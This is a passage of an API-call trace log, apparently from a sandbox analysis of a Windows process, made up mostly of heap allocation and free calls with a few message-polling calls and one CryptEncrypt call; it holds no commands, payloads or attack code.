1 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0236.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0236.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0236.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0236.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0236.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0236.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0236.722] CharLowerBuffW (in: lpsz="byte[1968]", cchLength=0xa | out: lpsz="byte[1968]") returned 0xa [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0236.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0236.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0236.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0236.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0236.724] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0236.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0236.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513b8 [0236.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0236.724] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf0dd8*, pdwDataLen=0x8cef60*=0x7aa, dwBufLen=0x7b0 | out: pbData=0x3bf0dd8*, pdwDataLen=0x8cef60*=0x7b0) returned 1 [0236.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0236.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0236.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0236.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0236.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0236.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54808 | out: hHeap=0x970000) returned 1 [0236.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56090 | out: hHeap=0x970000) returned 1 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56090 [0236.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0236.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0236.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0236.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0236.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0236.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0236.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0236.731] RtlAllocateHeap (HeapHandle=0x970000, 